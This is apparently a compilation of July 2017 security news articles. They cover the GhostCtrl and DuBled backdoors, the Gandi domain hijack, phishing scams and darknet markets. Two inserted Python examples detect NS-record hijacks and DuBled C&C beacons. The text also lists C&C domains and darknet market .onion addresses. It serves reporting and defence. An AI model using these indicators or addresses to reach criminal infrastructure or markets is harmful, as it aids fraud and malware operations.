In the first (cloud) scenario, the projected losses range from $4.6 billion for a large event to $53.1 billion for an extreme event. In the second (zero-day) scenario, the projected losses range from $9.7 billion for a large event to $28.7 billion for an extreme event. However, the report also notes that losses could be much lower or very much higher: as low as $15.6 billion or as high as $121.4 billion for an extreme cloud event.

The uninsured gap could be as much as $45 billion for the cloud services scenario – meaning that less than a fifth (17%) of the economic losses are covered by insurance. The insurance gap could be as high as $26 billion for the mass vulnerability scenario – meaning that just 7% of economic losses are covered.

This represents both a major market opportunity for the cyber insurance industry, and a poor understanding of the financial risk level within industry. The warning comes just weeks after major global ransomware attacks (WannaCry and NotPetya) and a U.S. government warning to industrial firms about a hacking campaign targeting the nuclear and energy sectors.

This variation in projected costs is caused by the second major conclusion drawn by the study -- neither the security industry nor the underwriting industry yet has sufficient understanding of global cybersecurity risk to formulate accurate risk/exposure figures for insurance purposes.

For example, for motor insurance, the industry has many years of detailed data on motor accidents: types of vehicle, ages of drivers, geolocations and so on; all against a background of improving motor safety. Cyber security, however, has little such data in a market whose conditions are continually worsening with new and more sophisticated attackers. This is further complicated by a poor understanding of liability and risk aggregation in cyber liability.

"The doomsday scenarios painted in the report highlight the growing issue of cyber risk aggregation," suggests Pete Banham, cyber resilience expert at Mimecast. "By adopting a cloud strategy that seeks to reduce the number of vendors, organizations may be tipping towards short term cost savings at the expense of security."

"For the insurance industry to capitalize on the growing cyber market," notes the report, "insurers would benefit from a deeper understanding of the potential tail risk implicit in cyber coverage." At the same time, it suggests, "Risk managers could use the cyber-attack scenarios to see what impacts cyber-attacks might have on their core business processes, and plan what actions they could take to mitigate these risks."

"This report gives a real sense of the scale of damage a cyber-attack could cause the global economy," comments Inga Beale, CEO of Lloyd's. "Just like some of the worst natural catastrophes, cyber events can cause a severe impact on businesses and economies, trigger multiple claims and dramatically increase insurers' claims costs. Underwriters need to consider cyber cover in this way and ensure that premium calculations keep pace with the cyber threat reality."

It should be noted, however, that the cyber security industry -- which could be impacted if industry diverts its primary risk strategy from mitigation (buying security controls) to transference (buying insurance) -- has its doubts.

"These are big numbers," comments David Emm, principal security researcher at Kaspersky Lab, "but they don't mean much unless terms such as 'serious cyber-attack' are quantified. How can we assess the global cost of an attack? It could mean anything from a temporary interruption of service to the takeover of customer systems – with very different costs. It's important for companies to conduct their own risk assessment and develop a strategy that's designed to secure corporate systems and mitigate the risk of an attack on those systems."

Two years ago, Lloyd's predicted that a major successful attack against the U.S. power grid "would cause between $243 billion to more than $1 trillion in economic damage."


Intel, Defense Bills Amended to Include Russian Hacking

17.7.2017 securityweek BigBrothers

Intelligence and defense policy legislation passed last week shows that the United States government is increasingly concerned about cyberattacks, particularly attacks coming from Russia.

The National Defense Authorization Act (NDAA), which the House of Representatives passed on Friday, specifies the budget and expenditures of the U.S. Department of Defense (DoD).

The list of amendments for the fiscal year 2018 includes several issues related to cyber capabilities. One of the adopted amendments requires the DoD to update its cyber strategy, requires the president to create a strategy for using offensive cyber capabilities, and provides for technical assistance to NATO members.

Other amendments include improvements to training, recruitment and retention of cyber personnel; the possibility to request additional resources if the House of Representatives is the victim of a cyberattack; and a ban on the DoD working with telecoms firms that were “complicit” in cyberattacks attributed to North Korea.

Another amendment requires the DoD to help Ukraine improve its cyber security capabilities. This comes after the country’s energy sector was hit two times by damaging cyberattacks believed to have been sponsored by the Russian government.

Russia is the focus of several amendments, including the cyberattacks believed to have been launched by state-sponsored actors and the country’s propaganda and disinformation initiatives. The Secretary of Defense and the Director of National Intelligence will be required to provide Congress a report on all attempts to hack DoD systems in the past two years by threat groups linked to Russia.

The Intelligence Authorization Act for Fiscal Year 2018, which the House Permanent Select Committee on Intelligence unanimously advanced on Thursday, also references Russia.

The Intelligence Authorization Act, which authorizes funding for the U.S. intelligence community, requires the Director of National Intelligence to submit a report assessing the most significant Russian influence campaigns aimed at foreign elections.

Without specifically naming Russia, the bill also requires an unclassified advisory report on foreign counterintelligence and cybersecurity threats to federal election campaigns. This comes after the U.S. officially accused Russia of attempting to interfere with last year’s presidential election.

There have been several incidents recently involving the leakage of classified information from the intelligence community, including the Vault7 files by WikiLeaks. An amendment to the Intelligence Authorization Act requires officials to submit semiannual reports on investigations into unauthorized public disclosures of classified information.

Another hot topic covered by the Intelligence Authorization Act is related to the retention of vulnerabilities. This has been a highly debated subject, particularly after the recent WannaCry ransomware attacks, which leveraged an exploit developed by the NSA. Following the attacks, a group of lawmakers introduced a new bill, the PATCH Act, whose goal is to help the government decide whether or not it should release vulnerability details to non-federal entities.


OmniRAT-Based Android Backdoor Emerges

17.7.2017 securityweek Virus

A newly discovered Android backdoor appears to be based on the OmniRAT remote administration tool (RAT) that targets Android, Windows, Linux and MacOS devices, Trend Micro security researchers warn.

Dubbed GhostCtrl, the threat masquerades as a legitimate or popular application and uses the names App, MMS, whatsapp, and even Pokemon GO. When launched, however, the malicious Android Application Package (APK) is decoded and saved on the Android device.

The APK is launched by a wrapper and the user is prompted to install it. The prompt, Trend Micro explains, does not go away even if the user attempts to dismiss it, eventually annoying the user into accepting the installation.

Once the installation has been completed, a service that helps the malicious code run in the background is launched. The backdoor function is usually named com.android.engine, in an attempt to mislead users into believing it is a legitimate system process.

The malware then connects to the command and control (C&C) server to retrieve commands; the server sends them encrypted and the malicious APK decrypts them upon receipt.

Trend's security researchers also noticed that the backdoor connects to a domain rather than directly to the C&C server’s IP address, most probably in an attempt to obscure traffic. Several dynamic DNS domains the researchers discovered at some point resolved to the same C&C IP address: hef–klife[.]ddns[.]net, f–klife[.]ddns[.]net, php[.]no-ip[.]biz, and ayalove[.]no-ip[.]biz.

“A notable command contains action code and Object DATA, which enables attackers to specify the target and content, making this a very flexible malware for cybercriminals. This is the command that allows attackers to manipulate the device’s functionalities without the owner’s consent or knowledge,” Trend Micro says.

The malware can control the Wi-Fi state; monitor the phone sensors’ data in real time; set phone’s UiMode, like night mode/car mode; control the vibrate function; download pictures as wallpaper; list the file information in the current directory and upload it to the C&C; delete/rename a file in the indicated directory; upload a desired file to the C&C; create an indicated directory; use the text to speech feature (translate text to voice/audio); send SMS/MMS to a number; delete browser history or SMS; download a file; call a phone number; open activity view-related apps; control the system infrared transmitter; and run a shell command and upload the output result.

“Another unique C&C command is an integer-type command, which is responsible for stealing the device’s data. Different kinds of sensitive—and to cybercriminals, valuable—information will be collected and uploaded, including call logs, SMS records, contacts, phone numbers, SIM serial number, location, and browser bookmarks,” the researchers explain.

Compared to other Android info-stealers, GhostCtrl can pilfer a great deal of data in addition to the above: Android OS version, username, Wi-Fi, battery, Bluetooth, and audio states, UiMode, sensor, data from camera, browser, and searches, service processes, activity information, and wallpaper.

Furthermore, the malware can intercept text messages from phone numbers specified by the attacker and can record voice or audio and upload the recording to the C&C. All the stolen data is sent to the server encrypted.

The malware also includes a series of commands that aren’t usually seen in Android RATs, such as the option to clear/reset the password of an account, set the phone to play different sound effects, specify the content in the Clipboard, customize the notification and shortcut link, control the Bluetooth to search and connect to another device, or set the accessibility to TRUE and terminate an ongoing phone call.

The first GhostCtrl version packed a framework to gain admin-level privilege, but had no function codes. These, however, were included in the subsequent variants, which also added an increasing number of device features that could be hijacked. The second version could also work as ransomware by locking the device’s screen and resetting the password, and could root the device. The third version, the security researchers say, includes obfuscation techniques to hide its malicious routines.

“GhostCtrl’s combination with an information-stealing worm, while potent, is also telling. The attackers tried to cover their bases, and made sure that they didn’t just infect endpoints. And with the ubiquity of mobile devices among corporate and everyday end users, GhostCtrl’s capabilities can indeed deliver the scares,” Trend Micro said.


Ashley Madison Offers $11 Million in Data Breach Settlement

17.7.2017 securityweek Hacking

Ruby Life Inc., the owner and operator of the online adultery service Ashley Madison, has offered to pay $11.2 million to individuals affected by the 2015 data breach.

Ashley Madison was breached in July 2015 by hackers who had threatened to leak the personal details of the website’s customers unless its owners shut down the service.

In mid-August, the hackers leaked details associated with well over 30 million user accounts, including names, addresses, phone numbers, email addresses, dates of birth, users’ interests and their physical description, password hashes, and credit card transactions. A few days later, they also dumped internal company files and emails.

The incident caused problems for a lot of people and there have been several suicides possibly related to the leak of Ashley Madison user data. Individuals affected by the breach filed class actions alleging inadequate data security practices and misrepresentations regarding the dating service.

In December 2016, Ruby, formerly named Avid Dating Life, agreed to pay a $1.6 million penalty to settle charges with the U.S. Federal Trade Commission (FTC) and state regulators for failing to protect confidential user information.

Ruby announced on Friday that it has also settled the customer lawsuits. If the settlement is approved by the court, the company will pay a total of $11.2 million to a fund that will be used to compensate customers who submitted valid claims for losses resulting from the 2015 data breach.

“While ruby denies any wrongdoing, the parties have agreed to the proposed settlement in order to avoid the uncertainty, expense, and inconvenience associated with continued litigation, and believe that the proposed settlement agreement is in the best interest of ruby and its customers,” Ruby stated.

Ruby also clarified that the identities of individuals who had signed up for Ashley Madison were not verified, allowing users to create accounts using other people's information.

“Therefore, ruby wishes to clarify that merely because a person's name or other information appears to have been released in the data breach does not mean that person actually was a member of Ashley Madison,” the company said.


Hundreds of Domains Hijacked From French Registrar Gandi

17.7.2017 securityweek Hacking

Hundreds of domains were hijacked earlier this month and redirected to an exploit kit landing page as part of an attack targeting the French domain name registrar and hosting services provider Gandi.

According to an incident report published by Gandi last week, the hacker attack involved one of its technical partners, which helps the company connect to some of the 200 registries that allow it to manage more than 2.1 million domain names across 730 top level domains (TLDs).

The attacker managed to obtain credentials to a web portal of this technical partner. It’s unclear how the credentials were stolen, but Gandi suspects that the data may have been intercepted from the HTTP connection to its partner’s portal. The company highlighted that neither its own systems nor the infrastructure of its technical partner were breached.

Once the attacker gained access to the web portal, they modified the name servers for 751 domains in an effort to redirect their visitors to an exploit kit.

According to SWITCH, the registry for .ch (Switzerland) and .li (Liechtenstein) domain names, which had 94 of its domains hijacked, victims were redirected to the RIG exploit kit. One of the affected domains belongs to Swiss security firm SCRT, which also had its incoming emails redirected to a foreign mail server.

Gandi said it learned about the incident on July 7 from a registrar and immediately started reverting the changes made by the attacker. The company has also reset all login credentials to the platforms used to connect to registries and technical partners.

In the case of SCRT, the visitors of its website were only redirected to the exploit kit for roughly one hour, but Gandi said the unauthorized changes were in place for up to 11 hours, until all the updates made by the attackers were reversed.

Gandi determined that 18 SSL certificates were issued for the affected domains during the attacks, but its analysis showed that each of the certificates is legitimate.

This was not the only recent incident involving domain names. Earlier this month, a security researcher noticed that he could register several domain names that matched the authoritative name servers for the .io TLD.

While the researcher suggested that registering the domains could have allowed him to hijack most of the DNS traffic for the .io TLD, others pointed out that the outcome couldn’t have been as catastrophic as the researcher claimed.
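The Gandi incident above was caught by a registrar, hours after the name servers had been changed. A domain owner can notice such a change sooner by comparing live NS records against a signed-off baseline. The following is an added example (not code from Gandi, SWITCH or SCRT); all domain and name-server names in it are constructed placeholders, and the lookup function is a stand-in that a real deployment would replace with a resolver call (for instance dnspython's `dns.resolver.resolve(domain, 'NS')`).

```python
"""Added example (not Gandi's, SWITCH's or SCRT's code): compare the live NS
records of a set of domains against a baseline the owner has signed off on,
so a registrar-side redirect like the one described above is noticed quickly.
All domain and name-server names below are constructed placeholders.
"""
from typing import Callable, Dict, Iterable, List, Set

# Constructed baseline: the name servers each domain is supposed to delegate to.
BASELINE: Dict[str, Set[str]] = {
    "shop.example": {"ns1.registrar.example.", "ns2.registrar.example."},
    "corp.example": {"ns1.registrar.example.", "ns2.registrar.example."},
    "blog.example": {"ns1.hosting.example.", "ns2.hosting.example."},
}

# Constructed stand-in for a live NS lookup. shop.example has had its whole NS
# set replaced, blog.example has one server swapped, corp.example is untouched
# (note the different case and missing trailing dots, which must not matter).
CONSTRUCTED_ANSWERS: Dict[str, List[str]] = {
    "shop.example": ["NS1.ROGUE.EXAMPLE", "ns2.rogue.example."],
    "corp.example": ["ns1.registrar.example", "NS2.registrar.example"],
    "blog.example": ["ns1.hosting.example.", "ns7.rogue.example."],
}


def normalise(name: str) -> str:
    """DNS names are case-insensitive; compare lower-cased, fully qualified forms."""
    name = name.strip().lower()
    return name if name.endswith(".") else name + "."


def lookup_constructed(domain: str) -> List[str]:
    """Stand-in for a real resolver call (e.g. dnspython's dns.resolver.resolve(domain, 'NS'))."""
    return CONSTRUCTED_ANSWERS.get(domain, [])


def check_ns(baseline: Dict[str, Iterable[str]],
             lookup: Callable[[str], Iterable[str]]) -> List[dict]:
    """Return one finding per domain whose delegation differs from the baseline."""
    findings = []
    for domain, expected in baseline.items():
        expected_n = {normalise(n) for n in expected}
        observed_n = {normalise(n) for n in lookup(domain)}
        if observed_n == expected_n:
            continue
        # No overlap with the expected set is what a registrar-level hijack looks
        # like; a partial change is more often an operator mistake but still needs a look.
        severity = "critical" if not (observed_n & expected_n) else "warning"
        findings.append({
            "domain": domain,
            "severity": severity,
            "added": sorted(observed_n - expected_n),
            "removed": sorted(expected_n - observed_n),
        })
    return findings


if __name__ == "__main__":
    for f in check_ns(BASELINE, lookup_constructed):
        print(f"{f['severity'].upper():8} {f['domain']}: +{f['added']} -{f['removed']}")
```

Run on a schedule from a host outside the registrar's own infrastructure, and query several independent resolvers, so that the check does not depend on the same systems an attacker may have altered.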


Backdoor Uses FFmpeg Application to Spy on Victims

17.7.2017 securityweek Virus

A recently observed feature-rich backdoor is capable of spying on its victim’s activities by recording full videos with the help of the "FFmpeg" application, Malwarebytes warns.

Detected as Backdoor.DuBled and written in .NET, the malware is distributed through a JS file containing an executable that installs itself under a random. To achieve persistence, the threat uses a run key, while also dropping a copy of itself in the startup folder.

The threat downloads the legitimate applications Rar.exe and ffmpeg.exe, along with related DLLs (DShowNet.dll and DirectX.Capture.dll) and uses them for its nefarious operations, the security researchers reveal.

FFmpeg is described by its developers as a "complete, cross-platform solution to record, convert and stream audio and video."

While running, the malware creates unencrypted .tmp files inside its installation folder, containing keystrokes and a log of the running applications. It was also observed closing and deleting some applications from the compromised machine, including ProcessExplorer and baretail.

Communication with the command and control (C&C) server is performed over TCP using port 98. Initial beaconing is performed by the server via a command “idjamel,” to which the threat responds with basic information about the victim machine, such as name/username, operating system, and a list of running processes.

Next, the server sends the configuration, which includes a list of targeted banks that the malware saves to the registry. The C&C also sends a set of Base64-encrypted PE files, including non-malicious helper binaries, and a URL to download the FFmpeg application (although the link points to a dummy page when accessed).

The analyzed sample was packed with the help of CloudProtector, which decrypts the payload using a custom algorithm and a key supplied in the configuration. The decrypted executable is then loaded in memory using process hollowing (or the RunPE technique).

“The unpacked payload is the layer containing all the malicious features. It is not further obfuscated, so we can easily decompile it and read the code,” Malwarebytes explains.

The threat was designed to spy on users and backdoor the infected machines. It can record videos using the FFmpeg application, snap screenshots, and log keystrokes. The video recording event is triggered when the victim accesses a site related to online banking, which clearly reveals the final purpose of the threat’s authors: to spy on victims’ banking activities.

Recorded videos are sent to the C&C encoded in Base64, while the screenshots (saved as JPG) and captured logs are periodically compressed using the RAR application, and then sent to the server.

The malware can also enumerate opened windows and can disable anti-malware applications. What’s more, the bot’s functionality can be expanded with the help of plugins, which it downloads from the C&C.

Two of the plugins the malware downloaded during analysis provided it with capabilities typical for a RAT: processmanager.dl (written in 2015), and remotedesktop.dll (written in 2016). The latter plugin was obfuscated, although the main malware module and the former plugin weren’t.

“This malware is prepared by an unsophisticated actor. Neither the binary nor the communication protocol is well obfuscated. The used packer is well-known and easy to defeat. However, the malware is rich in features and it seems to be actively maintained. Its capabilities of spying on the victim and backdooring the attacked machine should not be taken lightly,” Malwarebytes concludes.
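The article gives two concrete network markers for this backdoor: C&C traffic over TCP port 98 and a server-initiated "idjamel" beacon that the client answers with host, OS and process information. The code below is an added example, not Malwarebytes' code, showing how a defender could turn those markers into checks. The connection-log format, addresses, internal ranges and beacon payloads are all constructed, and the shape of the beacon reply (an OS name plus several .exe names) is an assumption drawn from the article's description rather than from a real sample.

```python
"""Added example, not Malwarebytes' code: two checks a defender could run
against the DuBled C&C behaviour described above (TCP on port 98, server-sent
"idjamel" command answered with host name, OS and process list). The log
format, addresses and payloads are constructed; the reply heuristic is an
assumption based on the article's description, not on a real sample.
"""
import ipaddress
from typing import Dict, List

C2_PORT = 98
BEACON_COMMAND = b"idjamel"

# Constructed internal ranges for this environment (not derived from the article).
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed, simplified connection log (tab-separated):
# ts  uid  src  sport  dst  dport  proto  duration_s
CONSTRUCTED_CONN_LOG = """\
1500278401.0\tC1\t10.0.0.15\t49233\t93.184.216.34\t443\ttcp\t12.1
1500278402.0\tC2\t10.0.0.15\t49234\t203.0.113.7\t98\ttcp\t3600.5
1500278403.0\tC3\t10.0.0.22\t51000\t10.0.0.1\t98\ttcp\t0.2
1500278404.0\tC4\t10.0.0.15\t49235\t198.51.100.9\t98\tudp\t1.0
"""

# Constructed beacon exchange shaped like the article's description.
SERVER_TO_CLIENT = b"idjamel\r\n"
CLIENT_TO_SERVER = b"WS-0042\\alice|Windows 7|explorer.exe,chrome.exe,ffmpeg.exe\r\n"


def parse_conn_log(text: str) -> List[Dict]:
    """Parse the constructed log into dicts; comment lines and blanks are skipped."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, uid, src, sport, dst, dport, proto, duration = line.split("\t")
        rows.append({"uid": uid, "src": src, "dst": dst, "dport": int(dport),
                     "proto": proto, "duration": float(duration)})
    return rows


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def suspicious_c2_sessions(rows: List[Dict]) -> List[Dict]:
    """Internal host talking TCP to an external server on port 98: worth a look."""
    return [r for r in rows
            if r["proto"] == "tcp" and r["dport"] == C2_PORT
            and is_internal(r["src"]) and not is_internal(r["dst"])]


def looks_like_dubled_beacon(server_to_client: bytes, client_to_server: bytes) -> bool:
    """Server sends the 'idjamel' command; the client answers with OS and a process
    list. The reply shape (OS name plus at least two .exe names) is an assumption."""
    if BEACON_COMMAND not in server_to_client.lower():
        return False
    reply = client_to_server.decode("latin-1").lower()
    has_os = any(os_name in reply for os_name in ("windows", "linux", "mac"))
    has_process_list = reply.count(".exe") >= 2
    return has_os and has_process_list


if __name__ == "__main__":
    for r in suspicious_c2_sessions(parse_conn_log(CONSTRUCTED_CONN_LOG)):
        print(f"port-98 session {r['uid']}: {r['src']} -> {r['dst']} ({r['duration']:.0f}s)")
    print("beacon match:", looks_like_dubled_beacon(SERVER_TO_CLIENT, CLIENT_TO_SERVER))
```

The port check on its own will produce false positives on networks where port 98 is used legitimately, which is why the beacon check is kept separate: a hit on both the port and the command string is a far stronger signal than either alone.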


SMS Phishing induces victims to photograph their own token card
17.7.2017 securityaffairs
Phishing

Renato Marinho detailed an unusual SMS phishing campaign that hit Brazilian users. All started with an SMS message supposedly sent from his bank.
Introduction

Today I faced quite an unusual SMS phishing campaign here in Brazil. A friend of mine received an SMS message supposedly sent from his bank asking him to update his registration data through the given URL. Otherwise, he could have his account blocked, as seen in Figure 1.


Figure 1 – SMS message received

To tell you the truth, my friend doesn’t have an account at the bank in question and, even so, we know that those kinds of messages are hardly ever sent by banks and are, most of the time, related to malware propagation and information stealing. However, instead of discarding the message, we decided to give it a try and the results, as you are going to read in this diary, surprised us. This campaign involves no malware propagation – just creativity in favor of evil.

SMS Phishing analysis

The link in the message aims to take the victim to a fake and very simplistic mobile version of a well-known bank website. First, it asks for the “CPF” (a kind of social security card number) and a password, as seen in Figure 2.


Figure 2 – Fake bank website asking for CPF and password

It is interesting to note that there is data input validation. The user must obey the CPF number composition rules, otherwise he can’t proceed. This validation is done by the JavaScript code shown in Figure 3.


Figure 3 – CPF validation rules

This kind of validation is certainly used to give a bit of legitimacy to the fake website and, perhaps, to avoid overloading the crooks with too much “data-mining” work.

On the next page, the fake website informs the victim that the device used for that connection needs to be authorized, as seen in Figure 4.


Figure 4 – Fake website: user must authorize the device

By clicking on “Habilitar Aparelho”, which means “enable device”, a new page is shown asking the victim to enter the 4-digit password, as seen in Figure 5.


Figure 5 – Fake website asking for the 4-digit password

Again, there is minimal validation to prevent the user from entering very simple passwords like “1234”, as seen in Figure 6.


Figure 6 – 4-digit password “validation” code

Next comes the step that caught our attention. The fake website asks the victim to take a picture of their token card and upload it. To be precise, it asks for a picture of the side with all the security codes used to validate banking transactions as a second authentication factor, as seen in Figure 7.


Figure 7 – Asking for the token card picture

By clicking on “Finalizar Habilitação”, which means “proceed with the device authorization”, the victim’s smartphone prompts the user to select a picture from their library or take a new one – which is exactly what the user is induced to do, as seen in Figure 8.


Figure 8 – Taking the token card picture

Once the victim completes the whole process, including the token card picture, the criminals have all the information needed to make fraudulent transactions on the compromised bank account, and the user is forwarded to the real bank login page.

Final words

Using a victim’s smartphone to take pictures in order to steal information or, who knows, things, scares me a little bit. I can explain. Earlier this month, reading Bruce Schneier’s blog, I saw a post entitled “Now It’s Easier than Ever to Steal Someone’s Keys” [1] which says, “The website key.me will make a duplicate key from a digital photo.”

While writing this diary, I was told about similar SMS phishing campaigns targeting other banks’ customers here in Brazil. Stay tuned.

References

[1] https://www.schneier.com/blog/archives/2017/07/now_its_easier_.html


Ashley Madison to Pay $11.2 Million to Data Breach Victims
17.7.2017 thehackernews Incindent
Ashley Madison, a prominent American dating website that helps people cheat on their spouses and was hacked two years ago, has agreed to an $11.2 Million settlement for roughly 37 million users whose personal details were exposed in that massive data breach.
Though the parent company of Ashley Madison, Ruby Corp., denies any wrongdoing, the company has pledged to pay around $3,500 to each of the hack's victims for the settlement.
The settlement has to be reviewed by a federal judge in St. Louis.
Ashley Madison marketed itself as a means to help people cheat on their spouses, with a tagline "Life is short. Have an affair."
The site was breached in July 2015 and hackers dumped nearly 100 gigabytes' worth of sensitive data belonging to 37 million users of the casual sex and marriage affair website onto the dark web.
The leaked data included victims' usernames, first and last names, email addresses, passwords, credit card information, street names, phone numbers, and transaction records, which led to blackmail and even suicides.
The 2015 data breach cost Ruby Corp, formerly known as Avid Life, over a quarter of its revenue and forced the Toronto-based company to spend millions of dollars to boost security and user privacy.
Ruby Corp was already forced to pay $1.66 Million to settle charges from Federal Trade Commission (FTC) and 13 states, alleging that the service misled its consumers about its privacy policy and didn't do enough to protect their information.
Besides this, the company also agreed to 20 years' worth of the FTC overseeing its network security to ensure that its user data is being protected. This includes:
Performing a risk assessment to protect customer data.
Implementing new data security protocols.
Upgrading systems based on the assessments.
Offering periodic security risk assessment (both internal and third-party).
Requiring "reasonable safeguards" against any potential cyber attacks from their service providers.
Now, according to Reuters, the company has to pay $11.2 million to users who were affected by the breach – users with valid claims can get up to $3,500 depending on their losses attributable to the breach.


Windows 10 Will Now Let You Reset Forgotten Password Directly From the Lock Screen
17.7.2017 thehackernews Safety

Microsoft is making every effort to make its Windows 10 Fall Creators Update bigger than ever before by beefing up its security practices and hardening it against hackers and cyber attacks in its next release.
Microsoft is finally adding one of the much-requested features to Windows 10: Pin and Password recovery option directly from the lock screen.
Yes, the next big update of Windows 10, among other features, will allow you to recover your forgotten pin and password, allowing you to reset your Windows password directly from the lock screen.
In Windows 10 Fall Creators Update, you will see "Reset password" or "I forgot my PIN" options on the login screen along with the sign-in box, mspoweruser confirmed.

Once you click on the option, Windows 10 will take you to the OOBE where Cortana will help you reset your password, after you successfully verify your identity using either your secondary email, your phone number, or Microsoft Authenticator.

A verification code will be sent to the option you chose, and once you enter it and verify your identity, you will be able to reset the password and regain access to your computer directly from the login screen.
The tech giant is currently testing this new feature in its Windows 10 Insiders build 16237, making it much easier for users to recover their Microsoft Accounts.
You can use this option if you have either activated the Windows Hello authentication system or have a PIN to secure your account.
With the launch of Windows 10 Creator Update (also known as RedStone 3), which is expected to release sometime between September and October 2017, the company has already planned to:
Remove the 30-year-old SMB v1 file sharing protocol.
Build AI-powered antivirus software.
Build its EMET anti-exploit tool into the kernel of the operating system.
Support three different flavours of the Linux OS – Ubuntu, Fedora, and SUSE – directly through their Windows Store.
Add new anti-ransomware feature, called Controlled Folder Access, as part of its Windows Defender.
Besides this new upgrade, Windows 10 Fall Update also includes improvements to Acrylic Material translucency effects, Task Manager, Mixed Reality headset and much more.
You can check out the complete list here.


What’s new after the AlphaBay Market Shutdown in the darkweb?
17.7.2017 securityaffairs  CyberCrime

Authorities shut down AlphaBay; which marketplace will now reach the top, and what will be the impact on the criminal ecosystem?
AlphaBay was shut down by law enforcement and the alleged mastermind committed suicide in jail while waiting for the extradition to the US.

The event will have a significant impact on the cybercriminal underground; it is now interesting to analyze the evolution of the other black marketplaces in order to understand which will be the biggest one in the coming months.

A good source could be the Dark Net Markets Comparison Chart published by the website DeepDotWeb.com; it integrates marketplace data with the hidden Dark Net Markets List ratings, along with uptime status data provided by DeepDotWeb’s monitoring system and creation dates from Gwern.net.

The researchers at DeepDotWeb used the following parameters to evaluate the popularity of each market; the data covers the 28 days up to July 12.

Impressions & Clicks – these two figures indicate how many pages from the site appeared on Google for search queries containing the market name, and how often they were clicked.
Searches on the site – simply how many times people entered search terms relating to the specific market in DeepDotWeb’s internal search.
Hits on related pages – how many visits there were to pages inside DeepDotWeb whose focus is a specific market (filtered using Google Analytics).

The table published by DeepDotWeb shows that the Russian black marketplace RAMP (Russian Anonymous Marketplace) and Dream Market are the biggest markets after the shutdown of AlphaBay, followed by the Hansa Market.


The RAMP marketplace (http://ramp5bb7v2abm34a.onion) is a Russian marketplace with a forum-like organization; it is frequented by prominent hackers from Eastern Europe.

Due to the forum-like structure, the products are not organized into categories, so it is not easy to calculate the exact number of listings or vendors on RAMP.

RAMP has been operating since September 2012; it is probably the oldest running darknet market, having already outlived its rivals Silk Road, Agora, and AlphaBay.

It is not clear how RAMP has survived so long; there is some speculation regarding its longevity, and some believe the main reason is that it is a Russian-focused market.

There are four main categories of vendors on RAMP:

Audited Dealers
Private Points
Market
Miscellaneous
The Audited Dealers group includes the more reliable group of vendors.

Like other black marketplaces, RAMP lists several prohibited kinds of posts and discussions about illegal goods and activities, including drugs, pornography and child pornography, weapons, fake documents, and banknotes.

“Based on the statistics presented on the forum at the time we did this review, RAMP had 186,304 users; 13,224 created topics, 931,494 posts (all time), and 88 posts for the week. These numbers show that RAMP is indeed a significant darknet community,” states the analysis published on the website Darknetmarkets.co. “The longevity and popularity of Russian Anonymous Marketplace appear surprising to some especially as the site claims to make around a quarter of a million every year but RAMPs’ owners believe that this is because it is in Russian and serves predominantly Russian users. Also, it could be due to its focus on drugs and prohibition of hacking and pornography.”

The Dream Market (http://lchudifyeqm4ldjj.onion/?ai=1675) has been around since Nov/Dec 2013; it is an excellent aggregator for buyers and sellers of any kind of drugs (i.e. Cannabis, Benzos, Ecstasy, etc.).
The filtering feature makes it easy to search the items offered on the black marketplace.

The listing for Digital Goods is growing with sellers offering mostly fraud-related goods, such as stolen account data, stolen credit card data (CV, CCV) and fake documents.

Many sellers offer guides and tutorials on hacking and other illegal activities such as carding, and it is also possible to find counterfeit banknotes from many countries. Hacking services are thin on the ground; no significant deals are available. The same goes for purchasing and customizing malware: it is quite easy to find well-known RATs and keyloggers, but this isn’t the right place to find complex malware.


The remaining markets are smaller, as the values of the parameters used for the analysis demonstrate.

NAME IMPRESSIONS CLICKS SEARCHES ON SITE HITS ON RELATED PAGES
Alphabay (Defunct) 323,452 67,713 1,116 408,016
RAMP (Russian) 58,618 23,413 363 210,271
Dream Market 56,430 32,467 451 227,470
Hansa Market 55,629 16,811 1 98,090
Silk road 3.1 10,418 1,048 10 14,365
House of lions 74 25 1 9,023
Darknet Heroes League 578 275 11 7,499
Apple market 177 14 2,680 6,727
WALL ST Market 885 68 4 5,593
The Majestic garden 2,353 849 1 4,655
CGMC 811 244 5 3,576
Zion Market 327 14 3 3,325
TradeRoute 260 103 7 3,061
Pyramid market 9 0 0 2,699
Pekarmarket 8 4 1 1,932
RSclub 69 32 0 1,538
Tochka 50 11 104 396


Did you receive a WhatsApp subscription ending email or text? Watch out!
17.7.2017 securityaffairs 
Social

Did you receive a WhatsApp subscription ending email or text? Watch out! It is a scam to steal your payment and personal data.
Researcher Graham Cluley is warning of bogus ‘WhatsApp subscription ending’ emails and texts.

Internet users are receiving an email pretending to be from WhatsApp and warning that an alleged WhatsApp subscription is about to end.

Although the company has not charged for the service since January 2016, crooks are attempting to exploit the fact that in the past WhatsApp used to ask users to pay a fee after they had been using the service for a year.

Using this social engineering attack, crooks aim to trick users into clicking links included in the messages, which could result in them handing their payment information over to the attackers.

“Have you received an email claiming to come from WhatsApp that warns that you have been using the service for more than one year and that it’s time to take out a subscription?”

“Beware! The emails are, of course, a scam designed to trick you into clicking links that might result in you handing your payment information over to fraudsters.” states the blog post published by Graham Cluley on the ESET blog.


Below a portion of the malicious email:

Your subscription is ending soon

Please update your payment information now

UPDATE YOUR PAYMENT INFORMATION

Our records indicate that your WhatsApp trial service is exceeding the one year period. At the completion of your trial period your WhatsApp will no longer be able to send or receive message. To continue using WhatsApp without interruption, we need you to subscribe for any of our subscription periods.

As usual, you should always be wary of unsolicited email messages and SMS text messages claiming to come from WhatsApp demanding payments or the verification of your account’s credentials.

“You ultimately decide what links you click on, and whether you hand over your passwords and payment card details. Always think twice, because the wrong decision could prove costly.” concluded Graham Cluley.


Crooks used Infrared insert skimmers in a recent wave of ATM attacks
16.7.2017 securityaffairs
Attack

The number of cyber attacks against ATMs involving so-called ‘insert skimmers’ is increasing. Brian Krebs wrote about recent attacks using infrared devices.
The number of cyber attacks against ATMs involving so-called ‘insert skimmers’ is increasing. Insert skimmers are wafer-thin fraud devices designed to fit invisibly inside the ATM card slot.

Insert Skimmers are able to capture card data and store it on an embedded flash memory.

The popular cyber security expert Brian Krebs reported that in some cases the insert skimmers are able to transmit stolen card data wirelessly via infrared.

Infrared is a short-range communication technology; we use it every day when we change the TV channel with a remote control.

Krebs cited a case from a few weeks ago in the Oklahoma City metropolitan area where at least four banks were victims of ATM attacks involving insert skimmers.
